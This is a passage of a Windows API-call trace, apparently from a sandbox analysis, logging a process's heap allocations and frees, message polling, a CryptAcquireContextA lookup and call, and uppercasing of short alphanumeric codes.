hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0190.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.690] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0190.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.690] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.691] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.693] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.694] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.694] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.694] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.694] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.694] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.694] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.695] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.695] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.695] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.695] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.696] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.696] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.697] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.698] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.698] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.698] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.698] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.698] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.698] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.698] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.699] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.699] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.699] PeekMessageW (in: 